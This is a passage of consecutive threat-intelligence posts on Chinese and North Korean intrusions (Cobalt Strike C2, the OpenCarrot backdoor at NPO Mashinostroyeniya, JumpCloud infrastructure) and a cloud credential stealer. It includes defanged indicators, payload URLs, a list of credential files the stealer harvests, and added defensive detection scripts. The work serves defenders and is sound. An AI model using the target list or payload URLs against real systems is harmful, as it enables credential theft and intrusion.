                        POST: /owa/LAC9kgQyM1HD3NSIwi–mx9sHB3vcmjJJm
www.100helpchat[.]com   GET:  /owa/aLgnP5aHtit33SA2p2MenNuBmYy
                        POST: /owa/XF0O-PjSCEslnDo51T0K4TOY

The Cobalt Strike profiles associated with the duckducklive[.]top, www.100helpchat[.]com, and live100heip[.]com domains share a C2 port number (8443) and a watermark (391144938). The earliest record of duckducklive[.]top becoming active is dated 24 Feb 2023. The earliest records of live100heip[.]com and 100helpchat[.]com becoming active are dated 24 Feb 2023 (overlapping with that of duckducklive[.]top) and 28 Feb 2023, respectively.
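As an added example (not tooling from the original post), the following Python flags proxy-log requests whose URI has one of the two profile shapes discussed above: a fixed /rest/2/meetings or /owa/ prefix directly followed by a single long random token, with no further path segment or query string, and records whether the destination port is the 8443 shared by these profiles. The log format, client addresses and hostnames are constructed; only the URIs are taken from the tables above.

```python
"""Flag HTTP requests whose URI matches the Cobalt Strike malleable-C2 URI
shapes described above (/rest/2/meetings<token> and /owa/<token>).

Added example for this write-up; not tooling from the original post. The log
lines are constructed, using TEST-NET addresses and example hostnames."""
import math
import re
from dataclasses import dataclass
from typing import List, Optional

# Fixed prefixes from the public profiles, followed by one long random token.
# The token is the whole remainder: no further path segment, no query string.
URI_PATTERNS = {
    "rest-meetings": re.compile(r"^/rest/2/meetings([A-Za-z0-9]{16,})$"),
    "owa": re.compile(r"^/owa/([A-Za-z0-9_-]{20,})$"),
}

# Constructed proxy log: time, client, method, scheme://host[:port]/uri, status
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>GET|POST) "
    r"(?P<scheme>https?)://(?P<host>[^/:\s]+)(?::(?P<port>\d+))?(?P<uri>/\S*) (?P<status>\d{3})$"
)

SAMPLE_LOG = """\
2023-03-01T10:00:01Z 10.0.0.5 GET https://198.51.100.7:8443/owa/aLgnP5aHtit33SA2p2MenNuBmYy 200
2023-03-01T10:00:02Z 10.0.0.5 POST https://198.51.100.7:8443/owa/XF0O-PjSCEslnDo51T0K4TOY 200
2023-03-01T10:00:03Z 10.0.0.9 GET https://mail.example.com/owa/auth/logon.aspx 200
2023-03-01T10:00:04Z 10.0.0.9 GET https://mail.example.com/owa/?ae=Item&t=IPM.Note 200
2023-03-01T10:00:05Z 10.0.0.12 POST https://198.51.100.8:8443/rest/2/meetingsmCRW64qPFqLKw7X56lR41fx 200
2023-03-01T10:00:06Z 10.0.0.12 GET https://api.example.com/rest/2/meetings/12345 200
"""


@dataclass
class Hit:
    client: str
    host: str
    port: Optional[int]
    profile: str
    token: str
    entropy: float
    port_match: bool  # True when the port equals the 8443 shared by the profiles above


def shannon_entropy(s: str) -> float:
    """Bits per character; random base64-like tokens score well above plain words."""
    if not s:
        return 0.0
    n = len(s)
    counts = {c: s.count(c) for c in set(s)}
    return -sum(k / n * math.log2(k / n) for k in counts.values())


def classify_uri(uri: str, min_entropy: float = 3.5) -> Optional[tuple]:
    """Return (profile, token, entropy) if the URI matches a profile shape.

    Legitimate OWA paths (/owa/auth/logon.aspx, /owa/?ae=...) fail the regex
    because they contain further segments or a query string."""
    for name, rx in URI_PATTERNS.items():
        m = rx.match(uri)
        if m:
            token = m.group(1)
            ent = shannon_entropy(token)
            if ent >= min_entropy:
                return name, token, round(ent, 2)
    return None


def scan_proxy_log(text: str, c2_port: int = 8443) -> List[Hit]:
    """Parse constructed proxy lines and return one Hit per matching request."""
    hits: List[Hit] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        res = classify_uri(m["uri"])
        if res is None:
            continue
        port = int(m["port"]) if m["port"] else None
        hits.append(Hit(m["client"], m["host"], port, res[0], res[1], res[2], port == c2_port))
    return hits


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_LOG):
        print(h)
```

The entropy floor keeps the check from firing on short or word-like path tails; tune it and the token lengths against your own proxy baseline before alerting on it.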

The three domains are each hidden behind Cloudflare, which was quick to remediate after we reported the service abuse. In this case, however, the actors revealed their true hosting locations through an OPSEC mistake in their initial deployment of the domains’ SSL certificates on their Alibaba Cloud hosting servers at 8.218.31[.]103, 47.242.72[.]118, and 47.242.159[.]242.

Certificate use on Alibaba IPs

While the analysis of the Cobalt Strike profiles provides links to previous BRONZE STARLIGHT activities, an assessment of the specific group attribution based on current intelligence should be treated with caution. It is noteworthy that Chinese cyberespionage threat actors are progressively refining their operational tactics in ways that obscure clear attribution through publicly available intelligence sources alone.

To illustrate this concept, consider the scenario where a broader array of domains imitating various brands may be interconnected, such as those publicly documented involving the BRONZE STARLIGHT, TA410, and APT10 threat actors. Examples include microsofts[.]net, microupdate[.]xyz, microsofts[.]info, microsofts[.]org, miscrosofts[.]com, microsofts[.]com, kaspresksy[.]com, tencentchat[.]net, and microsoftlab[.]top.

Conclusion

China-nexus threat actors have consistently shared malware, infrastructure, and operational tactics in the past, and continue to do so. The activities this post discusses illustrate the intricate nature of the Chinese threat landscape.

A better understanding of this landscape is essential for keeping up with its dynamics and improving defense strategies. Achieving this requires consistent collaboration and information sharing. SentinelLabs remains dedicated to this mission and continues to closely monitor related threats.

Indicators of Compromise


Second-Stage Data URLs

https[://]agenfile.oss-ap-southeast-1[.]aliyuncs.com/agent_source/temp1/cefhelper.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp2/agent_bak.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp3/adobe_helper.zip agentupdate_plugins.exe
https[://]codewavehub.oss-ap-southeast-1.aliyuncs[.]com/org/com/file/CodeVerse.zip AdventureQuest.exe

C2 Domains

www.100helpchat[.]com Cobalt Strike
live100heip[.]com Cobalt Strike

C2 IP Addresses

8.218.31[.]103 Cobalt Strike
47.242.72[.]118 Cobalt Strike

Comrades in Arms? | North Korea Compromises Sanctioned Russian Missile Engineering Company

By: Tom Hegel
7 August 2023 at 09:58

By Tom Hegel and Aleksandar Milenkoski 

Executive Summary

  • SentinelLabs identified an intrusion into the Russian defense industrial base, specifically the missile engineering organization NPO Mashinostroyeniya.
  • Our findings identify two instances of North Korea related compromise of sensitive internal IT infrastructure within this same Russian DIB organization, including a specific email server, alongside use of a Windows backdoor dubbed OpenCarrot.
  • Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
  • At this time, we cannot determine the potential nature of the relationship between the two threat actors. We acknowledge a potential sharing relationship between the two DPRK-affiliated threat actors as well as the possibility that tasking deemed this target important enough to assign to multiple independent threat actors.

Background

North Korean threat actors have caught our attention over the past year, providing us with fruitful insight into a variety of campaigns, such as new reconnaissance tools, (multiple) new supply chain intrusions, elusive multi-platform targeting, and new sly social engineering tactics. To add to that list, let’s take a look at an intrusion into what might be considered a highly desirable strategic espionage mission – supporting North Korea’s contentious missile program.

The Target Organization

While conducting our usual hunting and tracking of suspected North Korean threat actors, we identified a leaked email collection containing an implant with characteristics related to previously reported DPRK-affiliated threat actor campaigns. A thorough investigation of the email archive revealed a larger intrusion, not fully recognized at the time by the compromised organization.

The victim organization is NPO Mashinostroyeniya (JSC MIC Mashinostroyenia, NPO Mash), a leading Russian manufacturer of missiles and military spacecraft. The organization’s parent company is JSC Tactical Missiles Corporation KTRV (Russian: АО «Корпорация Тактическое Ракетное Вооружение», КТРВ). NPO Mashinostroyeniya is a sanctioned entity that possesses highly confidential intellectual property on sensitive missile technology currently in use and under development for the Russian military.

We are highly confident that the emails related to this activity originate from the victim organization. Furthermore, there are no discernible signs of manipulation or technically verifiable inaccuracies present in these emails. It’s essential to highlight that the leaked data comprises a substantial volume of emails unrelated to our current research scope. This suggests that the leak was likely accidental or resulted from activity unrelated to the specific intrusion under scrutiny in our investigation. However, this collection provides valuable background context for our understanding of their internal network design, security gaps, and even cases of activity by other attackers.

Example of unrelated email alerts from Russian CERT to NPO Mash

In mid-May 2022, roughly a week prior to Russia vetoing a U.N. resolution to impose new sanctions on North Korea for intercontinental ballistic missile launches that could deliver nuclear weapons, the victim organization internally flagged the intrusion. Internal NPO Mashinostroyeniya emails show IT staff exchanged discussions highlighting questionable communications between specific processes and unknown external infrastructure. The same day, the NPO Mashinostroyeniya staff also identified a suspicious DLL file present in different internal systems. The month following the intrusion, NPO Mashinostroyeniya engaged with their AV solution’s support staff to determine why this and other activity was not detected.

Following an examination of the emails and an in-depth investigation into the two separate sets of suspicious activity, we have successfully established a correlation between each cluster of activity and a respective threat actor amounting to a more significant network intrusion than the victim organization realized.

North Korean Overlap

During our investigation, we identified the suspicious file in question to be a version of the OpenCarrot Windows OS backdoor, previously identified by IBM X-Force as part of Lazarus group activities. As a feature-rich, configurable, and versatile backdoor, the malware is a strong enabler of the group’s operations. With a wide range of supported functionality, OpenCarrot enables full compromise of infected machines, as well as the coordination of multiple infections across a local network. The OpenCarrot variant we analyzed supports proxying C2 communication through internal network hosts as well as directly to the external server, which supports the strong possibility of a network-wide compromise.

Additionally, we discovered that the suspicious network traffic discussed in the emails stems from the compromise of the business’s Linux email server, hosted publicly at vpk.npomash[.]ru (185.24.244[.]11). At the time of discovery, the email server was beaconing outbound to infrastructure we now attribute to the ScarCruft threat actor. ScarCruft is commonly attributed to North Korea’s state-sponsored activity, targeting high value individuals and organizations near-globally. The group is also referred to as Inky Squid, APT37, or Group123, and often showcases a variety of technical capabilities for their intrusions. While we are unable to confirm the initial access method and implant running on the email server at the time of discovery, we link malware loading tools and techniques involving this set of infrastructure to those seen in previously reported ScarCruft activity using the RokRAT backdoor.

This intrusion gives rare insight into sensitive DPRK cyberespionage campaigns, and an opportunity to expand our understanding of the relationship and goals between various North Korean cyber threat actors. It also highlights a potential rift in relations between Russia and North Korea, considering their growing relationship.

This engagement establishes connections between two distinct DPRK-affiliated threat actors, suggesting the potential for shared resources, infrastructure, implants, or access to victim networks. Moreover, we acknowledge the possibility that the assigned task of an intrusion into NPO Mashinostroyeniya might have warranted targeting by multiple autonomous threat actors due to its perceived significance.

OpenCarrot Backdoor Activity

The OpenCarrot sample we analyzed is implemented as a Windows service DLL file, intended to execute in a persistent manner. In line with typical practices of the Lazarus group, OpenCarrot is subject to continuous, not necessarily incremental, changes. The file has a compilation timestamp of Wednesday, Dec. 01, 2021. Although the timestamp could have been manipulated by the threat actors, given the proximity to the May 2022 suspected intrusion date, it’s likely that the timestamp is authentic. Our confidence in this assessment also increases through the infrastructure analysis below.

The OpenCarrot variant we analyzed implements over 25 backdoor commands with a wide range of functionality representative of Lazarus group backdoors. In this case, supported functionality includes:

  • Reconnaissance: File and process attribute enumeration, scanning and ICMP-pinging hosts in IP ranges for open TCP ports and availability.
  • Filesystem and process manipulation: Process termination, DLL injection, and file deletion, renaming, and timestomping.
  • Reconfiguration and connectivity: Managing C2 communications, including terminating existing and establishing new comms channels, changing malware configuration data stored on the filesystem, and proxying network connections.

The OpenCarrot sample displays further characteristics often seen among Lazarus Group malware.

Its backdoor commands are indexed by consecutive integers, a common trait of Lazarus group malware. In addition to integer-indexed commands, the developers implement string-indexed sub-commands.

Backdoor command indexing

Keeping with their typical mode of operations, the malware is intended to execute as a Windows service and exports the ServiceMain function.

OpenCarrot implements executable code in a section named .vlizer indicating the use of code virtualization for obfuscation. The .vlizer section is associated with the Oreans Code Virtualizer code protection platform, a functional subset of Themida. As previously observed in Themida-protected Lazarus group malware, some code segments of the OpenCarrot variant we analyzed are not protected.

As part of its initialization process, OpenCarrot ingests configuration data from a file whose name is composed of the service name in whose context the malware executes and the dll.mui extension. The configuration data contains encryption-protected C2 information. The use of configuration files with the dll.mui extension is a long-standing theme among Lazarus group malware, mimicking a lesser-known standard Windows file extension used to denote application resources and externalities.

OpenCarrot implements relatively long sleep time periods. To avoid remaining idle for too long whenever the user of the infected machine is active, OpenCarrot implements a mechanism to exit its sleep state earlier than instructed. If the malware is instructed to sleep for 15 seconds or more, it then monitors in 15 second intervals for the insertion of new drives, such as USBs. If such an event occurs, the malware exits its sleep state before the configured sleep time elapses. A variant of this technique has been previously observed in the Pebbledash malware.

Disk drive monitoring

OpenCarrot’s versatility is evident with its support of multiple methods for communicating with C2 servers. The malware dispatches commands for execution based on attacker-provided data originating not only from remote C2 servers, but also from local processes through named pipes and incoming connections to a TCP port on which OpenCarrot listens.

Infrastructure Analysis

North Korea-nexus threat actors are known for not maintaining the OPSEC of their campaigns. A characteristic lack of segmentation allows researchers to amass unique insights across a variety of unreported activity. Infrastructure connections in particular often allow us to track the evolution of their campaigns over long periods of time.

We link the NPO Mashinostroyeniya email discussing suspicious network communication to active C2 communications occurring through 192.169.7[.]197 and 5.134.119[.]142. The internal host, the organization’s Red Hat email server, was actively compromised and in communication with the attackers’ malicious infrastructure. A review of all details indicates the threat actor was likely operating on this server for an extensive period of time prior to the internal team’s discovery.

Email between NPO Mash Employees sharing beaconing process details

This set of malicious infrastructure was served via CrownCloud (Australia) and OhzCloud (Spain) VPS hosting providers. During the intrusion, the two domains centos-packages[.]com and redhat-packages[.]com were resolving to those C2 IP addresses. Our assessment is that this particular cluster of infrastructure became active in November 2021, and was immediately paused the same day of NPO Mashinostroyeniya’s intrusion discovery in May 2022. This finding may indicate the intrusion was high priority and closely monitored by the operators.

Infrastructure and Timeline

A relationship can be observed between this cluster of activity and a more recent ScarCruft campaign. After the intrusion operators immediately killed their C2 server when the victim identified the suspicious traffic in May 2022, use of the centos-packages[.]com domain was paused until it began resolving to 160.202.79[.]226 in February 2023. 160.202.79[.]226 is a QuickPacket (US) VPS hosting IP also shared with the domain dallynk[.]com and others used by ScarCruft for malware delivery and C2 initiated through malicious documents.

Further, the domain dallynk[.]com follows the theme we’ve previously reported in which DPRK-associated threat actors impersonate Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea.

The collection of activity stemming from the dallynk[.]com domain contains malware loading tools and techniques matching those seen in previously reported ScarCruft activity using the RokRAT backdoor. Similarities in server configuration history can also link to lower-confidence BlueNoroff relationships.

Infrastructure ScarCruft Link

While conducting this research, we first publicly identified the link between the JumpCloud intrusion and North Korean threat actors. One detail that immediately struck us was the domain theme similarities, such as centos-pkg[.]org / centos-repos[.]org (JumpCloud), and centos-packages[.]com (NPO Mash). This detail is superficial and not strong enough alone to base direct clustering, but alongside other aforementioned North Korean threat actor connections, it stokes our curiosity for the particulars of the threat actors’ infrastructure creation and management procedures.

Lastly, we advise particular care in how this infrastructure is attributed when reviewed historically. For example, the C2 server IP address 192.169.7[.]197 was used between January and May 2022 by the DPRK-linked threat actor; however, that same IP was used by the Arid Viper/Desert Falcon APT in 2020, as first reported by Meta threat investigators. Arid Viper is associated with Palestinian interests, conducting activity throughout the Middle East. We assess the Arid Viper activity is unrelated to our findings and that the overlap of infrastructure is simply an example of commonly reused dubious VPS hosting providers. This further highlights the importance of associating active timeframes with IP-based indicators.
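The point about timeframes is easy to lose once an IP lands in a flat blocklist. As an added example (not tooling from the original post), the Python below stores each IP indicator with the window in which it was observed active and attributes a flow only when its date falls inside that window; the 2022 window is the one stated above, the 2020 Arid Viper window is an assumed year-wide approximation, and the flow records are constructed.

```python
"""Time-bounded IP indicator matching.

Added example for this write-up, not tooling from the original post. The same
VPS address can belong to different actors at different times, so an IP
indicator is only meaningful together with the window in which it was seen."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Tuple


@dataclass(frozen=True)
class IpIndicator:
    ip: str
    actor: str
    first_seen: date
    last_seen: date      # inclusive
    source: str


# Windows from the text above. The Arid Viper window is an assumption: the
# write-up only says the IP was used by that group in 2020.
INDICATORS: List[IpIndicator] = [
    IpIndicator("192.169.7.197", "DPRK-linked (ScarCruft cluster)",
                date(2022, 1, 1), date(2022, 5, 31), "SentinelLabs, NPO Mash intrusion"),
    IpIndicator("192.169.7.197", "Arid Viper / Desert Falcon",
                date(2020, 1, 1), date(2020, 12, 31), "Meta, 2020 (year granularity)"),
]


def attribute(ip: str, seen_on: date, indicators: List[IpIndicator] = INDICATORS,
              grace_days: int = 0) -> List[IpIndicator]:
    """Indicators for `ip` whose activity window contains `seen_on`.

    grace_days widens each window on both sides to tolerate imprecise
    first/last-seen dates; 0 means strict containment."""
    pad = timedelta(days=grace_days)
    return [i for i in indicators
            if i.ip == ip and i.first_seen - pad <= seen_on <= i.last_seen + pad]


def attribute_on(ip: str, iso_day: str, grace_days: int = 0) -> List[str]:
    """Convenience wrapper: ISO date string in, actor labels out."""
    return [i.actor for i in attribute(ip, date.fromisoformat(iso_day), grace_days=grace_days)]


# Constructed flow records: (date, internal source, external destination).
SAMPLE_FLOWS: List[Tuple[date, str, str]] = [
    (date(2022, 3, 10), "10.20.0.25", "192.169.7.197"),   # inside the DPRK window
    (date(2020, 6, 1),  "10.20.0.31", "192.169.7.197"),   # Arid Viper era
    (date(2023, 8, 1),  "10.20.0.25", "192.169.7.197"),   # after both windows
    (date(2022, 3, 10), "10.20.0.25", "203.0.113.9"),     # not an indicator at all
]


def triage(flows=SAMPLE_FLOWS, grace_days: int = 0):
    """Map each flow to the actor labels valid on that date ([] when none)."""
    return [(d, src, dst, [i.actor for i in attribute(dst, d, grace_days=grace_days)])
            for d, src, dst in flows]


if __name__ == "__main__":
    for d, src, dst, actors in triage():
        verdict = ", ".join(actors) if actors else "no indicator active on this date"
        print(f"{d} {src} -> {dst}: {verdict}")
```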

Conclusion

With a high level of confidence, we attribute this intrusion to threat actors independently associated with North Korea. Based on our assessment, this incident stands as a compelling illustration of North Korea’s proactive measures to covertly advance their missile development objectives, as evidenced by their direct compromise of a Russian Defense-Industrial Base (DIB) organization.

The convergence of North Korean cyber threat actors represents a profoundly consequential menace warranting comprehensive global monitoring. Operating in unison as a cohesive cluster, these actors consistently undertake a diverse range of campaigns motivated by various factors. In light of these findings, it becomes crucial to address and mitigate this threat with utmost vigilance and strategic response.


JumpCloud Intrusion | Attacker Infrastructure Links Compromise to North Korean APT Activity

By: Tom Hegel
20 July 2023 at 10:00

In recent news, the cloud-based IT management service JumpCloud publicly shared details gathered from the investigation into an intrusion on their network. Alongside the updated details, the organization shared a list of associated indicators of compromise (IOCs), noting attribution to an unnamed “sophisticated nation-state sponsored threat actor”.

Reviewing the newly released indicators of compromise, we associate this cluster of threat activity with a North Korean state-sponsored APT. The IOCs are linked to a wide variety of activity we attribute to the DPRK, overall centered on the supply chain targeting approach seen in previous campaigns.

Infrastructure Analysis

Based on the IOCs shared by JumpCloud (the domains and IP addresses published in their advisory), we were able to analyze the threat actor’s infrastructure.


By mapping out this infrastructure, it is possible to show the links between the diverse set of IP addresses and pick up various patterns.

Triggering alerts on 192.185.5[.]189 alone is ill advised, as it’s a shared hosting server for many domains and not an indicator of malicious activity by itself. However, toyourownbeat[.]com shares an SSL certificate with skylerhaupt[.]com, indicating a potential relationship in ownership.

The indicator 144.217.92[.]197 shared by JumpCloud does not host any domains from the list they shared, but we can see one similar through the use of passive DNS data: npmaudit[.]com, which was also just recently shared by GitHub in an alert of their own.

Based on public details available as of this writing, it’s unclear if the GitHub alert originated from the JumpCloud incident or if they are separate efforts by the same attacker.

Infrastructure Map Noting JumpCloud links

Moving on to IP address 23.29.115[.]171, we can see through PDNS data that the domain npm-pool[.]org is related. Notably, this domain is quite similar to the NPM theme of domains shared in the GitHub alert.

Infrastructure Map Noting JumpCloud and GitHub Overlap

While the following is not a strong indicator of attribution alone, it’s noteworthy that specific patterns in how the domains are constructed and used follow a similar pattern to other DPRK linked campaigns we track. Indicators with suspected actor association, but unverified as of this writing, include junknomad[.]com and insatageram[.]com (registered with jeanettar671belden[@]protonmail[.]com).

Additional pivots of potential interest can be made through other IPs, including 167.114.188[.]40, and to a variety of low confidence attacker-associated infrastructure.

Following the profile of the associated infrastructure from both the JumpCloud intrusion and the GitHub security alert, we can expand to further associated threat activity. For example, we can see clear links to other NPM and “package” themed infrastructure that we associate with high to medium confidence, a set that expands further thanks to the findings and blog from Phylum in late June.


Trivial pivots from here can be made to similar behaving infrastructure linked to TraderTraitor, as noted by GitHub, plus those of AppleJeus such as Celas Trade Pro via celasllc[.]com.

Conclusion

It is evident that North Korean threat actors are continuously adapting and exploring novel methods to infiltrate targeted networks. The JumpCloud intrusion serves as a clear illustration of their inclination towards supply chain targeting, which yields a multitude of potential subsequent intrusions. The DPRK demonstrates a profound understanding of the benefits derived from meticulously selecting high-value targets as a pivot point to conduct supply chain attacks into fruitful networks.

Cloudy With a Chance of Credentials | AWS-Targeting Cred Stealer Expands to Azure, GCP

13 July 2023 at 12:55

By Alex Delamotte, with Ian Ahl (Permiso) and Daniel Bohannon (Permiso)

Executive Summary

  • Throughout June 2023, an actor behind a cloud credentials stealing campaign has expanded their tooling to target Azure and Google Cloud Platform (GCP) services. Previously, this actor focused exclusively on Amazon Web Services (AWS) credentials.
  • Cloud service credentials are increasingly targeted as actors find more ways to profit from compromising such services. This actor targeted exposed Docker instances to deploy a worm-like propagation module.
  • These campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew. However, attribution remains challenging with script-based tools, as anyone can adapt the code for their own use.

Background

In December 2022, the threat research team at Permiso Security reported about a cloud credential stealer campaign that primarily targeted Amazon Web Services (AWS) credentials from public-facing Jupyter Notebooks services. The actors likely accessed these impacted services through unpatched web application vulnerabilities.

From June 14, 2023 through the end of the month, we worked with the Permiso team to track and analyze files related to a new incarnation of this campaign targeting exposed Docker services. The hallmark shell scripts remain the core of these campaigns, though we also identified an Executable and Linkable Format (ELF) binary written in Golang. The research team at Aqua also recently reported elements they observed from these actors’ abuse of Docker images.

SentinelLabs thanks the Permiso Security research team for their collaboration on the research in this report. The Permiso team released a blog about this campaign, which can be found here.

Tooling Updates

Since the December campaign, the actor has made several updates to how their tooling works.

Script Functionality

The December campaign targeted AWS credentials; the most recent campaigns added functions that target credentials from Azure and GCP. The actor actively modified these features as the campaigns evolved throughout June. Initially, a script named aws.sh contained references to Azure credentials, but the relevant function was not called. A week later, samples emerged in which the Azure credential functions were called.

The actor stores the generic credential file names in an array labeled CRED_FILE_NAMES. The AWS-specific array from the original script, ACF, has been replaced with AWS_CREDS_FILES. We dive into this in more detail in the next section. There are also two new cloud service provider (CSP)-specific credential variables: GCLOUD_CREDS_FILES and AZURE_CREDS_FILES.

The actor made the script more modular as it grew larger and more complex. The AWS functionality is now split into three smaller functions that are driven by the run_aws_grabber function only if the system is identified as AWS. This increases the efficiency of the script by running AWS commands only on AWS systems, which also enhances the script’s stealth.

Infrastructure

The actor no longer hosts files in an open directory, which complicates efforts to track and analyze these campaigns. Instead, C2 activity relies on a hardcoded username and password combination that are passed as arguments to the curl command.

The older campaign infrastructure was hosted on a Netherlands-based IP associated with Nice IT Services. The attacker has since moved infrastructure to AnonDNS, a dynamic domain name service (DDNS) provider. The campaigns through June 2023 use one of several AnonDNS subdomains:

everlost.anondns.net
silentbob.anondns.net
ap-northeast-1.compute.internal.anondns.net

Credentials Collection

The newer versions target credentials in newly added arrays GCLOUD_CREDS_FILES and AZURE_CREDS_FILES. The versions emerging the week of 6/26/2023 added .env and docker-compose.yaml; the version from 6/15/2023 has env without the period, so the actor is apparently updating the tool to be more effective in the newest campaign. The newest campaign also has a new variable, MIXED_CREDFILES which contains only redis.conf.

The newer versions omitted the following credentials files that were present in the December campaign’s ACF:

cloud
.npmrc
credentials.gpg

The credentials collection logic in the new campaign’s samples targets the following services & technologies:

| Technology | Targeted files |
|---|---|
| Amazon Web Services | .boto, .passwd-s3fs, .s3b_config, .s3backer_passwd, .s3cfg, credentials, s3proxy.conf |
| Azure | azure.json |
| Google Cloud Platform | .feature_flags_config.yaml, .last_opt_in_prompt.yaml, .last_survey_prompt.yaml, .last_update_check.json, access_tokens.db, active_config, adc.json, config_default, config_sentinel, credentials.db, gce |
| Censys | censys.cfg |
| Docker | docker-compose.yaml |
| FileZilla | filezilla.xml, recentservers.xml, queue.sqlite3 |
| Git | .git-credentials |
| Grafana | grafana.ini |
| Kubernetes | clusters.conf, kubeconfig, secrets |
| Linux OS | .netrc, netrc |
| Ngrok | ngrok.yml |
| PostgreSQL | .pgpass, postgresUser.txt, postgresPassword.txt |
| Redis | redis.conf |
| S3QL | authinfo2 |
| Server Message Block (SMB) | .smbclient.conf, .smbcredentials, .samba_credentials |
| Uncategorized | .env, accounts.xml, api_key, resource.cache, servlist.conf |

There is considerable overlap in the targeted files between these credential stealer campaigns and the TeamTNT Kubelet-targeting campaign reported by Sysdig in October 2022.

Arrays containing targeted credential file names in grab.sh

The script uses the cred_files function to search for credentials files on the system, write them to a temporary file $EDIS, copy the new file to a master credential-holding file $CSOF, then delete the temporary file. The $EDIS and $CSOF variable file names and paths are randomly generated via the special use Bash variable $RANDOM, meaning the value is an integer between 0 and 32767 that changes each time $RANDOM is accessed.
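As an added defender-side check, not code from the report or from the actor's scripts, the following Python audits a host for the credential file names in the table above and reports how widely each hit is readable, which tells you what a stealer landing on this host would collect. The directory roots, the depth limit and the readability labels are this example's own assumptions.

```python
"""Audit a host for the credential files these campaigns collect.

Added defender-side example, not code from the report or the actor's scripts.
Given one or more directory roots (home directories are the obvious choice), it
looks for the file names in the report's targeted-files table and reports each
hit with how widely it is readable. Roots and depth limit are assumptions.
"""
import os
import stat
from pathlib import Path

# File names from the report's "Technology / Targeted files" table.
TARGETED_FILES = {
    "aws": [".boto", ".passwd-s3fs", ".s3b_config", ".s3backer_passwd",
            ".s3cfg", "credentials", "s3proxy.conf"],
    "azure": ["azure.json"],
    "gcp": [".feature_flags_config.yaml", ".last_opt_in_prompt.yaml",
            ".last_survey_prompt.yaml", ".last_update_check.json",
            "access_tokens.db", "active_config", "adc.json", "config_default",
            "config_sentinel", "credentials.db", "gce"],
    "censys": ["censys.cfg"],
    "docker": ["docker-compose.yaml"],
    "filezilla": ["filezilla.xml", "recentservers.xml", "queue.sqlite3"],
    "git": [".git-credentials"],
    "grafana": ["grafana.ini"],
    "kubernetes": ["clusters.conf", "kubeconfig", "secrets"],
    "linux": [".netrc", "netrc"],
    "ngrok": ["ngrok.yml"],
    "postgres": [".pgpass", "postgresUser.txt", "postgresPassword.txt"],
    "redis": ["redis.conf"],
    "s3ql": ["authinfo2"],
    "smb": [".smbclient.conf", ".smbcredentials", ".samba_credentials"],
    "misc": [".env", "accounts.xml", "api_key", "resource.cache",
             "servlist.conf"],
}
NAME_TO_TECH = {name: tech for tech, names in TARGETED_FILES.items()
                for name in names}


def match_targeted(filenames):
    """Map each file name that appears in the table to its technology."""
    return {n: NAME_TO_TECH[n] for n in filenames if n in NAME_TO_TECH}


def classify_mode(mode):
    """Label how widely a file is readable from its st_mode permission bits."""
    if mode & stat.S_IROTH:
        return "world-readable"
    if mode & stat.S_IRGRP:
        return "group-readable"
    return "owner-only"


def audit_credential_files(roots, max_depth=4):
    """Return sorted (path, technology, readability) tuples for every
    targeted file name found under the roots, descending at most max_depth."""
    findings = []
    for root in roots:
        root = Path(root)
        if not root.is_dir():
            continue
        base_depth = len(root.parts)
        for dirpath, dirnames, filenames in os.walk(root):
            if len(Path(dirpath).parts) - base_depth >= max_depth:
                dirnames[:] = []  # stop descending past the depth limit
            for name, tech in match_targeted(filenames).items():
                path = Path(dirpath) / name
                try:
                    mode = path.lstat().st_mode
                except OSError:
                    continue
                findings.append((str(path), tech, classify_mode(mode)))
    return sorted(findings)


def summarize(findings):
    """Count hits per technology and how many are readable beyond the owner."""
    per_tech = {}
    exposed = 0
    for _path, tech, readability in findings:
        per_tech[tech] = per_tech.get(tech, 0) + 1
        if readability != "owner-only":
            exposed += 1
    return per_tech, exposed


if __name__ == "__main__":
    # Constructed demo: a throwaway directory holding two of the targeted files.
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        aws_dir = Path(tmp) / ".aws"
        aws_dir.mkdir()
        (aws_dir / "credentials").write_text("[default]\naws_access_key_id=EXAMPLE\n")
        (aws_dir / "credentials").chmod(0o600)
        (Path(tmp) / ".git-credentials").write_text("https://user:token@example.invalid\n")
        (Path(tmp) / ".git-credentials").chmod(0o644)
        results = audit_credential_files([tmp])
        for path, tech, readability in results:
            print(f"{readability:15} {tech:10} {path}")
        print(summarize(results))
```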

The cred_files function in aws.sh

AWS

The new scripts show more attention to making the features modular, a natural evolution as a script becomes more complex. The AWS-specific functionality is driven by a function named run_aws_grabber. Most AWS-centric features from the December campaign have been rolled into one of four functions driven by run_aws_grabber:

  • get_aws_infos: Queries the AWS instance metadata service (IMDS) for IAM configuration and sets the output to $AWS_INFO, as well as security credential configuration from EC2 and IAM resources, which are set to $AWS_1_EC2 and $AWS_1_IAM_NAME, respectively.
  • get_aws_meta: Writes the values from each of the variables generated in get_aws_infos then parses the data for specific values via grep and extracts them using sed, writing the output to the $CSOF variable.
  • get_aws_env: Checks for values in AWS credential related variables, writes them to $CSOF when present. When the $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is found, the function calls curl against the URL, then modifies the response using sed to format specific values into an aws configure set command. For example, the string AccessKeyId in the response is transformed to aws configure set aws_access_key_id. The actor likely chose to format the values as a command so that the output feeds into additional automated actions.
The get_aws_env function in aws.sh
  • get_awscli_data: This function is only implemented in the two most recent versions: the function exists in the 6/15/2023 version of aws.sh, but it is not called. The function invokes aws sts get-caller-identity to collect the 12-digit AWS account identifier and writes the result to $CSOF.

Azure & GCP

A notable recent addition is logic specific to the Azure and Google Cloud platforms. The get_azure and get_google functions are implemented in the newest versions seen on 06/26/2023; the logic was present in the 6/15 campaign, but the functions were not called. These changes indicate that these features are being actively developed, so we expect more changes as the actors roll out and test these features.

Newly implemented get_azure function in g.aws.sh

System Profiling

The attackers now perform system profiling through the aws.sh scripts as well as other scripts delivered under certain conditions. Another new feature is the get_docker function, which checks if the environment is a Docker container. When it is, the function runs docker inspect against each running container and saves the result to $CSOF. The output will not necessarily have credentials and this likely serves as a mechanism for system profiling.

